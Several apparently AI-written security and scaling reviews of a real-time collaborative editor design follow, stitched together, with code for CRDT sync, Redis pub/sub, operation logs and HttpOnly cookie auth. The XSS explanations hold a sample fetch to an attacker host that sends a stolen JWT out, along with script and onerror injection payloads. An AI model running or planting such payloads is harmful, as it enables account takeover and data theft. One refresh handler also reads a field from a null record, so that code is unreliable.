function resolveConflict(changeA, changeB) {
// Silent data loss - one change disappears forever
return changeA.clientTimestamp > changeB.clientTimestamp
? changeA
: changeB;
}
// Better approach: Vector clocks for causal ordering
class VectorClock {
constructor(nodeId) {
this.nodeId = nodeId;
this.clock = {}; // { userId: counter }
}
increment() {
this.clock[this.nodeId] = (this.clock[this.nodeId] || 0) + 1;
return { ...this.clock };
}
// Merge clocks when receiving remote event
merge(remoteClock) {
for (const [node, time] of Object.entries(remoteClock)) {
this.clock[node] = Math.max(this.clock[node] || 0, time);
}
}
// Returns: 'before' | 'after' | 'concurrent'
compare(otherClock) {
let aAheadOfB = false;
let bAheadOfA = false;
const allNodes = new Set([
...Object.keys(this.clock),
...Object.keys(otherClock)
]);
for (const node of allNodes) {
const aTime = this.clock[node] || 0;
const bTime = otherClock[node] || 0;
if (aTime > bTime) aAheadOfB = true;
if (bTime > aTime) bAheadOfA = true;
}
if (aAheadOfB && !bAheadOfA) return 'after';
if (bAheadOfA && !aAheadOfB) return 'before';
if (aAheadOfB && bAheadOfA) return 'concurrent'; // True conflict
return 'equal';
}
}
// Production recommendation: Use CRDT library (Yjs or Automerge)
// Yjs example - handles all of this automatically:
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('document')
// This merge is mathematically guaranteed to converge
// to the same result on all clients regardless of
// operation order or network delays
ytext.insert(0, 'Hello') // User A
ytext.insert(5, ' World') // User B - both changes preserved
Trade-offs:
| Approach | Correctness | Complexity | Bandwidth |
|---|---|---|---|
| LWW (current) | ❌ Data loss | Low | Low |
| OT | ✅ Correct | Very High | Medium |
| CRDT (Yjs) | ✅ Correct | Medium (library) | Higher |
| CRDT (Automerge) | ✅ Correct | Medium (library) | Highest |
Recommendation: Use Yjs — battle-tested, used by major editors, handles offline sync, has existing WebSocket provider.
Severity: HIGH — Data loss window + storage explosion
Problems with this approach:
┌─────────────────────────────────────────────────────────┐
│ User types for 29 seconds → server crashes │
│ Result: 29 seconds of work LOST with no warning │
│ │
│ Storage growth example: │
│ Document: 50KB HTML │
│ 10 active users × 2 snapshots/min × 60min = 60GB/day │
│ For 1000 concurrent documents = 60TB/day │
│ │
│ No change history = no undo beyond browser state │
│ No audit trail = compliance nightmare │
└─────────────────────────────────────────────────────────┘
Solution: Operation log with periodic compaction
// Store operations, not snapshots
const schema = `
-- Append-only operation log
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
user_id UUID NOT NULL,
op_type TEXT NOT NULL, -- 'insert' | 'delete' | 'format'
position INTEGER,
content TEXT,
attributes JSONB,
vector_clock JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
-- Efficient queries for sync
INDEX idx_doc_ops (document_id, id),
INDEX idx_doc_ops_since (document_id, created_at)
);
-- Periodic snapshots for fast loading (not primary storage)
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
snapshot_at BIGINT NOT NULL, -- operation ID at snapshot time
content JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY (document_id, snapshot_at)
);
`;
class DocumentStorage {
async applyOperation(docId, operation) {
return await this.db.transaction(async (trx) => {
// Write operation to log
const [op] = await trx('document_operations')
.insert({
document_id: docId,
...operation,
vector_clock: JSON.stringify(operation.vectorClock)
})
.returning('*');
// Check if we should create a snapshot
// (every 1000 ops or 10 minutes, whichever comes first)
await this.maybeSnapshot(docId, op.id, trx);
return op;
});
}
async loadDocument(docId, sinceOpId = null) {
if (sinceOpId) {
// Incremental sync: only fetch ops since last known state
return await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', sinceOpId)
.orderBy('id', 'asc');
}
// Full load: find nearest snapshot, then apply subsequent ops
const snapshot = await this.db('document_snapshots')
.where('document_id', docId)
.orderBy('snapshot_at', 'desc')
.first();
const ops = await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', snapshot?.snapshot_at ?? 0)
.orderBy('id', 'asc');
return { snapshot, ops };
}
}
Trade-offs:
Severity: HIGH
Current polling behavior:
─────────────────────────────────────────────────────────
Server A (User A connected) Server B (User B connected)
─────────────────────────────────────────────────────────
User A types "H"
→ Saved to PostgreSQL
Server B polls... (0-2s wait)
User B sees "H" appear
(up to 2 second delay)
At scale:
10 servers × 1 poll/2sec × 1000 documents = 5,000 queries/sec
just for polling, before any real work
─────────────────────────────────────────────────────────
Solution: Redis Pub/Sub for cross-server broadcasting
// Replace polling with event-driven pub/sub
import { createClient } from 'redis';
class RealtimeSync {
constructor() {
// Separate clients required - subscriber can't do other operations
this.publisher = createClient();
this.subscriber = createClient();
this.localSockets = new Map(); // docId → Set<WebSocket>
}
async initialize() {
await this.publisher.connect();
await this.subscriber.connect();
// Subscribe to ALL document channels on this server
// Pattern subscription avoids per-document subscriptions
await this.subscriber.pSubscribe(
'doc:*',
(message, channel) => {
const docId = channel.replace('doc:', '');
this.broadcastToLocalClients(docId, JSON.parse(message));
}
);
}
async publishChange(docId, change) {
// Broadcast to all servers instantly (no polling delay)
await this.publisher.publish(
`doc:${docId}`,
JSON.stringify({
...change,
serverId: process.env.SERVER_ID, // Prevent echo to self
timestamp: Date.now()
})
);
}
broadcastToLocalClients(docId, change) {
const sockets = this.localSockets.get(docId);
if (!sockets) return;
const message = JSON.stringify(change);
for (const socket of sockets) {
// Skip the originating connection if on this server
if (socket.userId !== change.userId && socket.readyState === WebSocket.OPEN) {
socket.send(message);
}
}
}
// Track which documents have clients on this server
registerClient(docId, socket) {
if (!this.localSockets.has(docId)) {
this.localSockets.set(docId, new Set());
}
this.localSockets.get(docId).add(socket);
}
deregisterClient(docId, socket) {
this.localSockets.get(docId)?.delete(socket);
}
}
Latency comparison:
Polling (current): 0ms ──────────────── 2000ms (average 1000ms)
Redis Pub/Sub: 0ms ── ~5ms (typical Redis latency)
Trade-offs:
Severity: HIGH — Causes document divergence between clients
Divergence scenario with current architecture:
──────────────────────────────────────────────────────────
Document state: "AC"
User A: insert 'B' at position 1 → "ABC" (op: ins(1,'B'))
User B: insert 'X' at position 1 → "AXC" (op: ins(1,'X'))
Both ops sent simultaneously. Server applies A then B:
ins(1,'B') → "ABC"
ins(1,'X') → "AXBC" ← Server state
User A receives B's op: ins(1,'X') applied to "ABC"
→ "AXBC" ✓ (accidentally correct here)
But User B receives A's op: ins(1,'B') applied to "AXC"
→ "ABXC" ✗ ← DIVERGED from server's "AXBC"
Users are now looking at different documents with no indication.
──────────────────────────────────────────────────────────
Solution: Server-side operation transformation
// Simplified OT for insert/delete operations
// (Production: use ShareDB or Yjs which handle this correctly)
class OperationTransformer {
// Transform operation A against operation B
// Returns A' such that: apply(apply(doc, B), A') = apply(apply(doc, A), B')
transform(opA, opB) {
if (opA.type === 'insert' && opB.type === 'insert') {
return this.transformInsertInsert(opA, opB);
}
if (opA.type === 'insert' && opB.type === 'delete') {
return this.transformInsertDelete(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'insert') {
return this.transformDeleteInsert(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'delete') {
return this.transformDeleteDelete(opA, opB);
}
}
transformInsertInsert(opA, opB) {
// If B inserts before A's position, shift A right
if (opB.position < opA.position ||
(opB.position === opA.position && opB.userId < opA.userId)) {
return { ...opA, position: opA.position + opB.content.length };
}
return opA; // B inserts after A, no adjustment needed
}
transformInsertDelete(opA, opB) {
if (opB.position < opA.position) {
// B deleted content before A's insert point
return { ...opA, position: opA.position - opB.length };
}
return opA;
}
// ... additional transform cases
}
class DocumentServer {
constructor() {
this.transformer = new OperationTransformer();
// Server maintains authoritative operation history
this.opHistory = new Map(); // docId → Operation[]
}
async applyOperation(docId, incomingOp) {
const history = this.opHistory.get(docId) || [];
// Find operations that happened concurrently with this one
// (all ops the client hadn't seen when they sent this op)
const concurrentOps = history.slice(incomingOp.knownRevision);
// Transform incoming op against all concurrent ops
let transformedOp = incomingOp;
for (const concurrentOp of concurrentOps) {
transformedOp = this.transformer.transform(transformedOp, concurrentOp);
}
// Apply transformed op and assign authoritative revision
transformedOp.revision = history.length;
history.push(transformedOp);
return transformedOp; // Send this to all other clients
}
}
Recommendation: Don't implement OT from scratch — use ShareDB (OT-based, battle-tested) or Yjs (CRDT-based, simpler mental model). Both handle all these edge cases.
Severity: CRITICAL — Complete account takeover possible
Attack vector:
─────────────────────────────────────────────────────────
1. Attacker finds XSS vulnerability (e.g., in document
content rendered without sanitization — likely given
this stores HTML)
2. Malicious script injected:
fetch('https://attacker.com/steal?token=' +
localStorage.getItem('jwt_token'))
3. Attacker now has valid 24-hour JWT
4. Can impersonate user, access all documents
5. User has NO way to invalidate it (JWTs are stateless)
─────────────────────────────────────────────────────────
Solution: HttpOnly cookies + token rotation
// Server-side: Set tokens in HttpOnly cookies
app.post('/auth/login', async (req, res) => {
const user = await authenticateUser(req.body);
const accessToken = generateAccessToken(user, '15m'); // Short-lived
const refreshToken = generateRefreshToken(user); // Long-lived
// Store refresh token in DB for revocation capability
await db('refresh_tokens').insert({
token_hash: hash(refreshToken),
user_id: user.id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000),
created_at: new Date()
});
// HttpOnly = JavaScript cannot access this cookie
// Secure = HTTPS only
// SameSite = CSRF protection
res.cookie('access_token', accessToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000 // 15 minutes
});
res.cookie('refresh_token', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
path: '/auth/refresh', // Only sent to refresh endpoint
maxAge: 30 * 24 * 60 * 60 * 1000
});
res.json({ user: sanitizeUser(user) }); // No token in response body
});
// Silent token refresh before expiry
app.post('/auth/refresh', async (req, res) => {
const refreshToken = req.cookies.refresh_token;
if (!refreshToken) return res.status(401).json({ error: 'No refresh token' });
// Check token hasn't been revoked
const stored = await db('refresh_tokens')
.where('token_hash', hash(refreshToken))
.where('expires_at', '>', new Date())
.whereNull('revoked_at')
.first();
if (!stored) {
// Possible token theft - revoke all user sessions
await revokeAllUserSessions(stored?.user_id);
return res.status(401).json({ error: 'Invalid refresh token' });
}
// Rotate refresh token (detect replay attacks)
await db('refresh_tokens')
.where('id', stored.id)
.update({ revoked_at: new Date() });
const newAccessToken = generateAccessToken(stored.user_id, '15m');
const newRefreshToken = generateRefreshToken(stored.user_id);
await db('refresh_tokens').insert({
token_hash: hash(newRefreshToken),
user_id: stored.user_id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)
});
res.cookie('access_token', newAccessToken, { httpOnly: true, secure: true, sameSite: 'strict' });
res.cookie('refresh_token', newRefreshToken, {
httpOnly: true, secure: true, sameSite: 'strict', path: '/auth/refresh'
});
res.json({ ok: true });
});
Trade-offs:
Severity: CRITICAL
// Current: storing and rendering raw HTML is dangerous
// A user can embed: <script>stealAllDocuments()</script>
// Or: <img src="x" onerror="exfiltrate(document.cookie)">
// Solution: Never store or render raw HTML
// Use a structured document format instead
// Store as structured JSON (like ProseMirror/Slate schema)
const documentSchema = {
type: 'doc',
content: [
{
type: 'paragraph',
attrs: { align: 'left' },
content: [
{ type: 'text', text: 'Hello world', marks: [{ type: 'bold' }] }
]
}
]
};
// When rendering, use a whitelist-based renderer
// that ONLY renders known-safe node types
class SafeRenderer {
ALLOWED_NODES = new Set(['doc', 'paragraph', 'text', 'heading',
'bulletList', 'listItem', 'codeBlock']);
ALLOWED_MARKS = new Set(['bold', 'italic', 'underline', 'code', 'link']);
ALLOWED_LINK_PROTOCOLS = new Set(['https:', 'http:', 'mailto:']);
render(node) {
if (!this.ALLOWED_NODES.has(node.type)) {
console.warn(`Blocked disallowed node type: ${node.type}`);
return ''; // Drop unknown nodes entirely
}
// ... render each node type explicitly
}
renderMark(mark, content) {
if (!this.ALLOWED_MARKS.has(mark.type)) return content;
if (mark.type === 'link') {
const url = new URL(mark.attrs.href);
if (!this.ALLOWED_LINK_PROTOCOLS.has(url.protocol)) return content;
// Note: rel="noopener noreferrer" prevents tab-napping
return `<a href="${escapeHtml(mark.attrs.href)}"
rel="noopener noreferrer"
target="_blank">${content}</a>`;
}
// ... other marks
}
}
Severity: CRITICAL
Catastrophic scenario:
─────────────────────────────────────────────────────────
User A: GET /api/documents/secret-doc
→ CloudFront caches response for 5 minutes
User B (different org, no access): GET /api/documents/secret-doc
→ CloudFront serves cached response ← CONFIDENTIAL DATA LEAK
─────────────────────────────────────────────────────────
Solution: Never cache authenticated API responses at CDN
// Middleware to set correct cache headers on ALL API responses
app.use('/api', (req, res, next) => {
// Prevent any caching of API responses
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, private',
'Pragma': 'no-cache',
'Surrogate-Control': 'no-store', // CDN-specific header
'CDN-Cache-Control': 'no-store' // CloudFront specific
});
next();
});
// CDN should ONLY cache:
// - Static assets (JS, CSS, images) → long cache + content hash filenames
// - Public, unauthenticated content only
// - Never anything with Authorization header or session cookies
// CloudFront behavior configuration (infrastructure as code):
const cloudFrontConfig = {
behaviors: [
{
pathPattern: '/api/*',
cachePolicyId: 'CACHING_DISABLED', // AWS managed policy
originRequestPolicyId: 'ALL_VIEWER', // Forward all headers
},
{
pathPattern: '/static/*',
cachePolicyId: 'CACHING_OPTIMIZED',
// Static assets use content-hash filenames: main.a3f8b2.js
// Safe to cache for 1 year
}
]
};
Severity: HIGH — Changes lost on any network hiccup
Current behavior on disconnect:
─────────────────────────────────────────────────────────
User types 500 chars → network blip for 3 seconds
→ WebSocket drops
→ Those 500 chars are GONE (never reached server)
→ User doesn't know
→ User continues typing on now-stale document
→ Reconnects to DIFFERENT server (round-robin LB)
→ Server has no knowledge of this client's state
→ Document state is now inconsistent
─────────────────────────────────────────────────────────
Solution: Client-side operation queue with acknowledgments
class ResilientWebSocketClient {
constructor(url) {
this.url = url;
this.pendingOps = []; // Ops sent but not acknowledged
this.unsentOps = []; // Ops not yet sent
this.lastServerRevision = 0;
this.reconnectDelay = 1000;
this.maxReconnectDelay = 30000;
this.connected = false;
}
connect() {
this.ws = new WebSocket(this.url);
this.ws.onopen = () => {
this.connected = true;
this.reconnectDelay = 1000; // Reset backoff
// Rejoin document with last known state
// Server can send us everything we missed
this.ws.send(JSON.stringify({
type: 'rejoin',
documentId: this.documentId,
lastKnownRevision: this.lastServerRevision
}));
// Resend any unacknowledged operations
this.flushPendingOps();
};
this.ws.onmessage = (event) => {
const msg = JSON.parse(event.data);
if (msg.type === 'ack') {
// Server confirmed receipt - remove from pending
this.pendingOps = this.pendingOps.filter(op => op.id !== msg.opId);
this.lastServerRevision = msg.revision;
} else if (msg.type === 'operation') {
this.handleRemoteOperation(msg);
} else if (msg.type === 'catchup') {
// Server sending us ops we missed during disconnect
msg.operations.forEach(op => this.handleRemoteOperation(op));
}
};
this.ws.onclose = () => {
this.connected = false;
this.scheduleReconnect();
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
// onclose will fire after onerror, triggering reconnect
};
}
sendOperation(op) {
const envelope = {
...op,
id: generateId(),
clientRevision: this.lastServerRevision
};
if (this.connected) {
this.pendingOps.push(envelope);
this.ws.send(JSON.stringify(envelope));
} else {
// Queue for when connection restores
this.unsentOps.push(envelope);
}
}
flushPendingOps() {
// Resend ops that were sent but not acknowledged
for (const op of this.pendingOps) {
this.ws.send(JSON.stringify(op));
}
// Send ops that were queued while disconnected
for (const op of this.unsentOps) {
this.pendingOps.push(op);
this.ws.send(JSON.stringify(op));
}
this.unsentOps = [];
}
scheduleReconnect() {
setTimeout(() => {
this.reconnectDelay = Math.min(
this.reconnectDelay * 2, // Exponential backoff
this.maxReconnectDelay
);
this.connect();
}, this.reconnectDelay + Math.random() * 1000); // Jitter prevents thundering herd
}
}
Severity: HIGH
Round-robin load balancing with WebSockets:
─────────────────────────────────────────────────────────
Client connects to Server A → WebSocket established
Client's HTTP request (token refresh) → routed to Server B
Server B has no WebSocket context for this client
Server A goes down → client reconnects to Server B
Server B has no document state for this client
─────────────────────────────────────────────────────────
Solution: Sticky sessions OR stateless WebSocket servers
Option 1: Sticky sessions (simpler, less resilient)
─────────────────────────────────────────────────────────
Load Balancer config:
- Hash client IP or session ID
- Always route same client to same server
- Problem: server failure still drops all its connections
- Problem: uneven load distribution
Option 2: Stateless WebSocket servers (recommended)
─────────────────────────────────────────────────────────
All connection state stored in Redis:
- Active document sessions
- Client cursor positions
- Pending operations per client
- Any server can handle any client
┌─────────┐ ┌─────────────────────────────────┐
│ Client │────▶│ Any WebSocket Server │
└─────────┘ │ (stateless - reads from Redis) │
└──────────────┬──────────────────┘
│
┌──────────▼──────────┐
│ Redis Cluster │
│ - Session state │
│ - Pub/Sub channels │
│ - Op queues │
└─────────────────────┘
Severity: HIGH — Will become bottleneck at scale
Current write pattern per keystroke:
─────────────────────────────────────────────────────────
User types one character:
1. INSERT into document_changes (PostgreSQL write)
2. 9 other servers poll SELECT (PostgreSQL reads × 9)
3. Repeat for every character typed by every user
At 100 concurrent users typing at 3 chars/sec:
- 300 writes/sec
- 300 × (N-1) polling reads (grows with server count)
- At 10 servers: 2,700 reads/sec just for polling
- Polling reads compete with document load queries
─────────────────────────────────────────────────────────
Solution: Separate concerns — PostgreSQL for durability, Redis for real-time
Revised data flow:
─────────────────────────────────────────────────────────
User types → WebSocket → Server
├──▶ Redis Pub/Sub (real-time broadcast, ~1ms)
└──▶ Operation log buffer
│
└──▶ Batch write to PostgreSQL
(every 100ms or 50 ops)
─────────────────────────────────────────────────────────
Benefits:
- Real-time path: Redis only (fast, no DB load)
- Durability path: PostgreSQL (batched, efficient)
- Separation allows independent scaling
class OperationBuffer {
constructor() {
this.buffer = new Map(); // docId → Operation[]
this.flushInterval = setInterval(() => this.flush(), 100);
// Flush on shutdown to prevent data loss
process.on('SIGTERM', async () => {
clearInterval(this.flushInterval);
await this.flush();
process.exit(0);
});
}
add(docId, operation) {
if (!this.buffer.has(docId)) {
this.buffer.set(docId, []);
}
this.buffer.get(docId).push(operation);
// Immediate flush if buffer is large
if (this.buffer.get(docId).length >= 50) {
this.flushDocument(docId);
}
}
async flush() {
const promises = [];
for (const docId of this.buffer.keys()) {
promises.push(this.flushDocument(docId));
}
await Promise.all(promises);
}
async flushDocument(docId) {
const ops = this.buffer.get(docId);
if (!ops || ops.length === 0) return;
this.buffer.set(docId, []); // Clear before async op to avoid double-write
try {
// Bulk insert is much more efficient than individual inserts
await db('document_operations').insert(ops);
} catch (error) {
// Put ops back in buffer for retry
const current = this.buffer.get(docId) || [];
this.buffer.set(docId, [...ops, ...current]);
throw error;
}
}
}
Severity: MEDIUM
Problem with org-based partitioning:
─────────────────────────────────────────────────────────
Google (org_id: 1) has 50,000 employees all editing docs
→ All their data on one partition → overloaded
Startup (org_id: 2) has 5 employees
→ Their partition is nearly idle
Result: Uneven load, one partition becomes bottleneck
regardless of adding more hardware
─────────────────────────────────────────────────────────
Solution: Composite partition key with consistent hashing
-- Partition by document_id (UUID) for even distribution
-- Keep org_id for efficient org-level queries via index
CREATE TABLE documents (
id UUID DEFAULT gen_random_uuid(),
org_id UUID NOT NULL,
title TEXT,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (id); -- Even distribution regardless of org size
-- Create partitions
CREATE TABLE documents_p0 PARTITION OF documents
FOR VALUES WITH (modulus 8, remainder 0);
-- ... through documents_p7
-- Efficient org-level queries still possible via index
CREATE INDEX idx_documents_org ON documents (org_id, created_at DESC);
-- For operation log, partition by document_id + time range
-- This enables efficient pruning of old operations
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
-- ... other columns
) PARTITION BY RANGE (created_at);
-- Monthly partitions enable easy archival
CREATE TABLE document_operations_2024_01
PARTITION OF document_operations
FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');
Severity: MEDIUM
// Without connection pooling, each server opens many DB connections
// PostgreSQL has hard limits (~100-500 connections)
// 20 servers × 50 connections each = 1,000 connections → DB crashes
// Solution: PgBouncer as connection pooler
// Architecture:
// App Servers → PgBouncer (transaction pooling) → PostgreSQL
//
// PgBouncer in transaction mode:
// - 20 servers can share 20 actual DB connections
// - Connections returned to pool after each transaction
// - PostgreSQL sees manageable connection count
// Application configuration
const pool = new Pool({
host: 'pgbouncer', // Point to PgBouncer, not PostgreSQL directly
max: 10, // Per-server pool size (PgBouncer multiplexes these)
idleTimeoutMillis: 30000,
connectionTimeoutMillis: 2000,
// Critical: PgBouncer transaction mode doesn't support
// prepared statements - disable them
statement_timeout: 5000,
});
// Monitor pool health
pool.on('error', (err) => {
logger.error('Unexpected pool error', err);
metrics.increment('db.pool.error');
});
Severity: MEDIUM — Core feature gap
// Users can't see each other's cursors/selections
// This is a fundamental collaborative editing feature
class PresenceManager {
constructor(redis) {
this.redis = redis;
this.PRESENCE_TTL = 30; // seconds
}
async updatePresence(docId, userId, presenceData) {
const key = `presence:${docId}:${userId}`;
await this.redis.setEx(
key,
this.PRESENCE_TTL,
JSON.stringify({
userId,
cursor: presenceData.cursor, // { paragraph, offset }
selection: presenceData.selection, // { anchor, head }
color: presenceData.color, // Assigned color for this user
name: presenceData.displayName,
lastSeen: Date.now()
})
);
// Notify other clients of presence update
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_update', userId, ...presenceData })
);
}
async getDocumentPresence(docId) {
const pattern = `presence:${docId}:*`;
const keys = await this.redis.keys(pattern);
if (keys.length === 0) return [];
const values = await this.redis.mGet(keys);
return values
.filter(Boolean)
.map(v => JSON.parse(v));
}
async removePresence(docId, userId) {
await this.redis.del(`presence:${docId}:${userId}`);
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_leave', userId })
);
}
}
Severity: HIGH — Cascading failure risk
import CircuitBreaker from 'opossum';
// Without circuit breakers:
// PostgreSQL slows down → all requests wait → servers exhaust threads
// → entire application becomes unresponsive
// → users see spinning wheels, not helpful errors
const dbCircuitBreaker = new CircuitBreaker(
async (query) => await db.raw(query),
{
timeout: 3000, // Call fails if takes longer than 3s
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30s
volumeThreshold: 10, // Minimum calls before evaluating
}
);
dbCircuitBreaker.fallback(async (query) => {
// Degraded mode: serve from cache if available
const cached = await redis.get(`query_cache:${hash(query)}`);
if (cached) {
metrics.increment('circuit_breaker.cache_hit');
return JSON.parse(cached);
}
// Return meaningful error instead of hanging
throw new ServiceUnavailableError(
'Document service temporarily unavailable. Your changes are saved locally.'
);
});
dbCircuitBreaker.on('open', () => {
logger.error('DB circuit breaker OPEN - database unreachable');
alerting.critical('Database circuit breaker opened');
});
dbCircuitBreaker.on('halfOpen', () => {
logger.info('DB circuit breaker testing recovery');
});
dbCircuitBreaker.on('close', () => {
logger.info('DB circuit breaker closed - database recovered');
});
┌────────────────────────────────────────────────────────────────────────┐
│ PRIORITY MATRIX │
├──────────────────────────────────────┬────────────┬────────────────────┤
│ Issue │ Severity │ Fix Complexity │
├──────────────────────────────────────┼────────────┼────────────────────┤
│ CDN caching authenticated responses │ CRITICAL │ Low (config change)│
│ JWT in localStorage (XSS) │ CRITICAL │ Medium │
│ HTML storage (XSS injection) │ CRITICAL │ High │
│ LWW with client clocks │ CRITICAL │ High (CRDT/OT) │
│ No OT/CRDT (document divergence) │ HIGH │ High │
│ 2-second polling │ HIGH │ Medium (Redis) │
│ No WebSocket reconnection │ HIGH │ Medium │
│ Full snapshot storage (data loss) │ HIGH │ High │
│ No circuit breakers │ HIGH │ Low (library) │
│ LB breaks WebSocket routing │ HIGH │ Medium │
│ PostgreSQL as message bus │ HIGH │ Medium │
│ Hot partition (org-based) │ MEDIUM │ Medium │
│ No connection pooling │ MEDIUM │ Low (PgBouncer) │
│ No presence/cursor sync │ MEDIUM │ Medium │
│ No graceful degradation │ MEDIUM │ Low (library) │
│ 24h JWT expiry (too long) │ MEDIUM │ Low │
│ No operation acknowledgment │ MEDIUM │ Medium │
│ No audit log │ LOW │ Low (side effect │
│ │ │ of op log) │
└──────────────────────────────────────┴────────────┴────────────────────┘
Week 1 — Fix critical security issues (no architectural changes required):
1. Move CDN to never cache /api/* routes
2. Migrate JWT to HttpOnly cookies
3. Sanitize document content (stop storing raw HTML)
Week 2-3 — Fix data integrity:
4. Integrate Yjs for CRDT-based sync
5. Switch to operation log storage
6. Add Redis Pub/Sub (eliminate polling)
Week 4-5 — Fix resilience:
7. Implement WebSocket reconnection with op queue
8. Add circuit breakers
9. Deploy PgBouncer
Week 6+ — Scaling improvements:
10. Stateless WebSocket servers
11. Fix partition strategy
12. Add presence/cursor sync
The three issues you can fix today with no architectural changes (CDN caching, localStorage JWT, HTML injection) are also the three that could cause immediate catastrophic data breaches. Start there.
Of course. This is an excellent exercise. The proposed architecture has several critical flaws that would lead to data loss, poor performance, and a broken user experience. Here is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with specific solutions and their trade-offs.
Issue: Last-Write-Wins (LWW) with Client Clocks This is the most critical flaw. Client clocks are not reliable or synchronized. Using them for conflict resolution is a recipe for data loss and bizarre, unpredictable behavior.
Solution: Use a Centralized, Monotonic Sequencing System Abandon client timestamps entirely. The server must be the single source of truth for ordering events.
Trade-offs:
Issue: Broadcasting Only to Clients on the Same Server This architecture creates "islands" of users. A change made by a user on Server A will be instantly visible to others on Server A, but users on Servers B, C, and D won't see it until their server polls Postgres (up to 2 seconds later). This is an unacceptable delay for real-time collaboration and breaks the "real-time" illusion.
Scaling Bottleneck: The system cannot scale horizontally without introducing this massive latency and inconsistency.
Solution: Introduce a Pub/Sub Messaging Layer Introduce a dedicated, fast Pub/Sub system like Redis Pub/Sub or Apache Kafka.
document:123).document:123.Trade-offs:
Issue: Other Servers Polling PostgreSQL Polling the database every 2 seconds is a terrible scaling anti-pattern.
Solution: The Pub/Sub solution above completely eliminates the need for this poll. The Pub/Sub system becomes the real-time event bus, and the database is used for persistence and as the source of truth for the current full state.
Issue: Saving Full HTML Snapshots Every 30 Seconds This is extremely inefficient.
Solution: Store a History of Operations (Event Sourcing)
Instead of storing snapshots, store every atomic operation (e.g., {type: 'insert', index: 42, text: 'a'}).
Trade-offs:
Issue: JWT Tokens Stored in localStorage
localStorage is vulnerable to XSS (Cross-Site Scripting) attacks. If a malicious script is injected into your React app (e.g., via a third-party library), it can steal the JWT token, giving an attacker full access to the user's account for 24 hours.
Solution: Store JWTs in httpOnly Cookies
httpOnly cookies cannot be accessed by JavaScript, making them immune to XSS theft.SameSite=Lax (or Strict) attribute to help mitigate CSRF attacks. Since this is an API that should only be called by your own frontend, you should also implement CSRF tokens if you are using cookies.Trade-offs:
Issue: Caching API Responses for 5 Minutes
Caching any authenticated API responses at a CDN level is extremely dangerous. A user's GET /documents/123 response must never be cached and served to another user.
Solution: Do Not Cache Authenticated API Responses in CloudFront
Cache-Control: private, no-cache, no-store headers are set. Alternatively, do not route API traffic through CloudFront at all; use the load balancer directly.Trade-offs:
Issue: Server-Centric WebSocket Connections If a user's API server crashes or is taken down for deployment, all its WebSocket connections are abruptly terminated. The client's React SPA will have to reconnect, but with round-robin LB, it will likely connect to a different server. The new server has no inherent knowledge of the user's previous connection state.
Solution: Use Redis to Store WebSocket Session State
Implement a Sticky Session Load Balancer Policy:
| Component | Original Flaw | Proposed Solution | Key Benefit |
|---|---|---|---|
| Conflict Resolution | LWW + Client Clocks | OT, CRDT, or Server Sequence Numbers | Prevents data loss |
| Real-Time Sync | Server Islands + DB Polling | Redis/Kafka Pub/Sub | True real-time sync, enables scaling |
| Storage | Full HTML Snapshots | Event Sourcing + Occasional Snapshots | Reduces I/O, enables history |
| Auth | JWT in localStorage | JWT in httpOnly + SameSite Cookie | Mitigates XSS attacks |
| CDN | Cached API responses | No API caching on CDN | Prevents data leakage |
| WebSockets | Server-local state | Sticky Sessions + Redis Session Store | Handles server failures gracefully |
Implementing these changes would transform the architecture from a fundamentally broken design into a robust, scalable, and secure system suitable for a real-time collaborative editor.
Cross-Server Sync Delay (Polling Bottleneck)
Unreliable Conflict Resolution (Client Timestamps)
Data Loss Risk with Snapshots
JWT Security in localStorage
Stale CDN Caching
/api/doc?id=1&v=123).Stateless Load Balancing with WebSockets
Sec-WebSocket-Key header or IP hashing.Read Replica Lag
Hotspots in Document Partitioning
org_id + doc_id_hash) or dynamic resharding.Race Conditions in Snapshot Saves
UPDATE ... WHERE version = X).High Database Load from Polling
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in your architecture, along with proposed solutions and trade-offs:
Problem: Clients connected to different API servers won’t receive real-time updates from each other due to isolated WebSocket connections per server. Polling PostgreSQL every 2 seconds introduces latency (up to 2s sync delay).
Solution:
Problem: Client clocks are unreliable (can drift or be maliciously set), leading to data loss if a stale edit has a later timestamp.
Solution:
Problem: Polling every 2s scales poorly (N servers × M documents → high DB load).
Solution:
Problem: Storage bloat (especially for large documents) and expensive snapshotting under high load.
Solution:
Problem: Storing JWTs in localStorage makes them vulnerable to XSS attacks.
Solution:
Problem: Stale document data if cached API responses don’t reflect real-time edits.
Solution:
Problem: High write load during peak editing (all changes hit the primary DB).
Solution:
Problem: A single server handling too many WebSocket connections (memory/CPU limits).
Solution:
Problem: If WebSockets fail, the UI may freeze (no fallback).
Solution:
Problem: Hot partitions if some orgs are much more active.
Solution:
Problem: Session cache loss if Redis fails.
Solution:
Each solution balances performance, complexity, and reliability. The highest-priority fixes are WebSocket fragmentation (Pub/Sub) and LWW conflicts (server timestamps).
Here’s a comprehensive analysis of failure modes, race conditions, and scaling bottlenecks in the proposed architecture, along with specific solutions and trade-offs.
Solution: Use a Pub/Sub system (Redis Pub/Sub or dedicated message broker like Kafka) for cross-server real-time notifications.
